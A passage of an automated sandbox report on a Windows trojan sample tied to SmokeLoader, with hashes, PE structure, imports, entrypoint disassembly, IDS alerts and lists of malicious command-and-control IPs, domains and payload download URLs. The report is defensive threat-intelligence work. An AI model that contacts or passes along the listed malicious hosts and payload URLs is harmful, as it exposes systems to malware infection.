https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.micro	explorer.exe, 00000002.00000000.2234479094.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2231041832.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2234452297.0000000007B50000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comEMd	explorer.exe, 00000002.00000000.2242095283.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.2242095283.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.come	explorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000002.00000000.2238006366.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns.windows.com/e	explorer.exe, 00000002.00000000.2238006366.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei	explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
211.171.233.129	unknown	Korea Republic of		3786	LGDACOMLGDACOMCorporationKR	true
125.7.253.10	nwgrus.ru	Korea Republic of		3786	LGDACOMLGDACOMCorporationKR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532900
Start date and time:	2024-10-14 06:01:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/2@7/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 38 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
00:02:36	API Interceptor	411183x Sleep call for process: explorer.exe modified
06:02:35	Task Scheduler	Run new task: Firefox Default Browser Agent B647DD7AD17A1342 path: C:\Users\user\AppData\Roaming\fbtdajh

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
211.171.233.129	bCnarg2O62.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	rFdy6Oh3xT.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	cajgtus.com/files/1/build3.exe
	IzXkxsTrEt.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	sdfjhuz.com/dl/build2.exe
	SKHOtnHl7J.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	trmpc.com/check/index.php
	p2xoB50aKi.exe	Get hash	malicious	SmokeLoader, Vidar	Browse	sjyey.com/tmp/index.php
	RnnWoAEP9mUhOXN_9mNdOzaP.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	cbinr.com/forum/index.php
	qpPYm1rHOS.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	cbinr.com/forum/index.php
	8TmTmPo08O.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Stealc	Browse	sjyey.com/tmp/index.php
125.7.253.10	YK85paB4RW.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	E6YUQ1pon1.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	3441TYcdND.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	NNETz5j0y4.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	75f6kL8SJ2.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	WPC6G1Ykup.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	0S2jhDIWWK.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	1HGXcC63iu.exe	Get hash	malicious	SmokeLoader	Browse	189.161.95.103
	K80v6DHFHE.exe	Get hash	malicious	SmokeLoader	Browse	148.230.249.9
	FyDBXJE74v.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	file.exe	Get hash	malicious	SmokeLoader	Browse	63.143.98.185
	fTKQwp8fRa.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	LgigaSKsL6.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.147.128.172
	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	119.204.11.2
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LGDACOMLGDACOMCorporationKR	uSE8AyujGn.elf	Get hash	malicious	Mirai	Browse	210.219.31.16
	PeleHfdpzX.elf	Get hash	malicious	Mirai	Browse	112.222.254.29
	VwiubbxMcD.exe	Get hash	malicious	RMSRemoteAdmin	Browse	106.250.166.45
	VwiubbxMcD.exe	Get hash	malicious	RMSRemoteAdmin	Browse	106.250.166.45
	na.elf	Get hash	malicious	Mirai	Browse	123.141.118.206
	na.elf	Get hash	malicious	Mirai	Browse	1.211.217.206
	na.elf	Get hash	malicious	Mirai	Browse	1.208.17.118
	na.elf	Get hash	malicious	Mirai	Browse	1.218.3.77
	na.elf	Get hash	malicious	Mirai	Browse	115.88.245.30
	na.elf	Get hash	malicious	Mirai	Browse	106.244.84.81
LGDACOMLGDACOMCorporationKR	uSE8AyujGn.elf	Get hash	malicious	Mirai	Browse	210.219.31.16
	PeleHfdpzX.elf	Get hash	malicious	Mirai	Browse	112.222.254.29
	VwiubbxMcD.exe	Get hash	malicious	RMSRemoteAdmin	Browse	106.250.166.45
	VwiubbxMcD.exe	Get hash	malicious	RMSRemoteAdmin	Browse	106.250.166.45
	na.elf	Get hash	malicious	Mirai	Browse	123.141.118.206
	na.elf	Get hash	malicious	Mirai	Browse	1.211.217.206
	na.elf	Get hash	malicious	Mirai	Browse	1.208.17.118
	na.elf	Get hash	malicious	Mirai	Browse	1.218.3.77
	na.elf	Get hash	malicious	Mirai	Browse	115.88.245.30
	na.elf	Get hash	malicious	Mirai	Browse	106.244.84.81

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	274944
Entropy (8bit):	5.743757942440379
Encrypted:	false
SSDEEP:	3072:tOe0QuzbNAj5HG/NTG7U+L50CyxF9Dav/cGKt6KUCIqzpjAqMi:we0QCyj5Ho08/4/wVIqzpjAqh
MD5:	29EAF4B051758C9946539B6BA8AA475F
SHA1:	7F2CE245C72D8689AAA7460CD6D12DB57B9C36BA
SHA-256:	8001AF6BBC3CC10B1382C5EFC800E479804AD1E30F0D99A57ADD656A811AFBCD
SHA-512:	AB2C9443AB55E81D17CA452A4D0508F52E3A3AC23801E4D6375496A6FD230094B5CB2991BD467087F03D27BC3DA387973D308880402D565899177722BE5BE032
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................U.c......q......`.......v......E.....................a......d....Rich...................PE..L......d.................h....s.....".............@...........................t.............................................\...P....Pr..-...........................................................................................................text....g.......h.................. ..`.rdata...!......."...l..............@..@.data.....p.........................@....cip.....D....q..8..................@....cer.....(... r..(..................@....rsrc....-...Pr.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fbtdajh:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.743757942440379
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	274'944 bytes
MD5:	29eaf4b051758c9946539b6ba8aa475f
SHA1:	7f2ce245c72d8689aaa7460cd6d12db57b9c36ba
SHA256:	8001af6bbc3cc10b1382c5efc800e479804ad1e30f0d99a57add656a811afbcd
SHA512:	ab2c9443ab55e81d17ca452a4d0508f52e3a3ac23801e4d6375496a6fd230094b5cb2991bd467087f03d27bc3da387973d308880402d565899177722be5be032
SSDEEP:	3072:tOe0QuzbNAj5HG/NTG7U+L50CyxF9Dav/cGKt6KUCIqzpjAqMi:we0QCyj5Ho08/4/wVIqzpjAqh
TLSH:	D344F7816AF16C13FFB64B314E39D9942A3FBCA25E7572DFA100760F187B1A1A513B12
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................U.c.......q.......`.......v......E........................a.......d.....Rich....................PE..L......d...

File Icon


Icon Hash:	17694cb2b24d2117

Static PE Info

General

Entrypoint:	0x401a22
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64BAF5C9 [Fri Jul 21 21:16:57 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	dc51987737c4af4f71f5c3733cf2b1f2

Entrypoint Preview

Instruction
call 00007FF694E054C2h
jmp 00007FF694E01D3Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041C650h], eax
mov dword ptr [0041C64Ch], ecx
mov dword ptr [0041C648h], edx
mov dword ptr [0041C644h], ebx
mov dword ptr [0041C640h], esi
mov dword ptr [0041C63Ch], edi
mov word ptr [0041C668h], ss
mov word ptr [0041C65Ch], cs
mov word ptr [0041C638h], ds
mov word ptr [0041C634h], es
mov word ptr [0041C630h], fs
mov word ptr [0041C62Ch], gs
pushfd
pop dword ptr [0041C660h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041C654h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041C658h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041C664h], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041C5A0h], 00010001h
mov eax, dword ptr [0041C658h]
mov dword ptr [0041C554h], eax
mov dword ptr [0041C548h], C0000409h
mov dword ptr [0041C54Ch], 00000001h
mov eax, dword ptr [0041B008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041B00Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000D8h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1985c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2725000	0x22dd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x18000	0x19c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x167af	0x16800	43c1bbcfda4f28a6db426899f1d4530d	False	0.80537109375	data	7.5080418109409415	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x18000	0x21b0	0x2200	8f7390606cfa5526c62a62295eb9b3af	False	0.37247242647058826	data	5.561090816497167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x270121c	0x1600	4ed3ce2f485fe937021c499d3aa5b9cb	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.cip	0x271d000	0x4400	0x3800	b211778b80f6d441b6cf61ada776fc6d	False	0.0025809151785714285	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.cer	0x2722000	0x2800	0x2800	1276481102f218c981e0324180bafd9f	False	0.00322265625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2725000	0x22dd0	0x22e00	98cbbd9c6f082883c092beb04fa7479f	False	0.3801873319892473	data	4.840484397561957	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x273d678	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x273d7a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x273fd78	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x273fea8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x2725b50	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5674307036247335
RT_ICON	0x27269f8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6376353790613718
RT_ICON	0x27272a0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6849078341013825
RT_ICON	0x2727968	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7456647398843931
RT_ICON	0x2727ed0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.512863070539419
RT_ICON	0x272a478	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6137429643527205
RT_ICON	0x272b520	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6163934426229508
RT_ICON	0x272bea8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7553191489361702
RT_ICON	0x272c388	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.39925373134328357
RT_ICON	0x272d230	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.5036101083032491
RT_ICON	0x272dad8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.5264976958525346
RT_ICON	0x272e1a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.5570809248554913
RT_ICON	0x272e708	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.3549792531120332
RT_ICON	0x2730cb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.38320825515947465
RT_ICON	0x2731d58	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.4036885245901639
RT_ICON	0x27326e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.42021276595744683
RT_ICON	0x2732bc0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39285714285714285
RT_ICON	0x2733a68	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5537003610108303
RT_ICON	0x2734310	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6226958525345622
RT_ICON	0x27349d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6372832369942196
RT_ICON	0x2734f40	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.425422138836773
RT_ICON	0x2735fe8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4209016393442623
RT_ICON	0x2736970	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.46187943262411346
RT_ICON	0x2736e40	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.279317697228145
RT_ICON	0x2737ce8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.3664259927797834
RT_ICON	0x2738590	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.3773041474654378
RT_ICON	0x2738c58	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.3764450867052023
RT_ICON	0x27391c0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.2587136929460581
RT_ICON	0x273b768	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.27345215759849906
RT_ICON	0x273c810	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.28852459016393445
RT_ICON	0x273d198	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.32180851063829785
RT_STRING	0x2742630	0xaa	data			0.5588235294117647
RT_STRING	0x27426e0	0x600	data			0.4361979166666667
RT_STRING	0x2742ce0	0x460	data			0.45
RT_STRING	0x2743140	0x64a	data			0.4360248447204969
RT_STRING	0x2743790	0x7b4	data			0.417342799188641
RT_STRING	0x2743f48	0x6d0	data			0.4294724770642202
RT_STRING	0x2744618	0x76c	data			0.42526315789473684
RT_STRING	0x2744d88	0x606	data			0.4455252918287938
RT_STRING	0x2745390	0x7c2	data			0.42245720040281975
RT_STRING	0x2745b58	0x810	data			0.42102713178294576
RT_STRING	0x2746368	0x584	data			0.4461756373937677
RT_STRING	0x27468f0	0x74c	data			0.4234475374732334
RT_STRING	0x2747040	0x710	data			0.4303097345132743
RT_STRING	0x2747750	0x5f6	data			0.4325032765399738
RT_STRING	0x2747d48	0x88	data			0.625
RT_GROUP_CURSOR	0x273fd50	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x2742450	0x22	data			1.088235294117647
RT_GROUP_ICON	0x2732b48	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x273d600	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x272c310	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x2736dd8	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x2742478	0x1b4	data			0.5756880733944955

Imports

DLL	Import
KERNEL32.dll	OpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, QueryDosDeviceA, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, DeleteVolumeMountPointA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, WritePrivateProfileStringA, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SearchPathW, GetNumaProcessorNode, GetConsoleFontSize, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CloseHandle, CreateFileA
GDI32.dll	GetBoundsRect
ADVAPI32.dll	ClearEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-14T06:02:41.580888+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.6	49862	125.7.253.10	80	TCP
2024-10-14T06:02:43.242369+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.6	49873	125.7.253.10	80	TCP
2024-10-14T06:02:44.741563+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.6	49884	125.7.253.10	80	TCP
2024-10-14T06:02:46.242232+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.6	49895	125.7.253.10	80	TCP
2024-10-14T06:02:47.819583+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.6	49906	125.7.253.10	80	TCP
2024-10-14T06:02:49.336141+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.6	49917	125.7.253.10	80	TCP
2024-10-14T06:02:50.858357+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.6	49928	125.7.253.10	80	TCP
2024-10-14T06:02:52.382811+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.6	49939	125.7.253.10	80	TCP
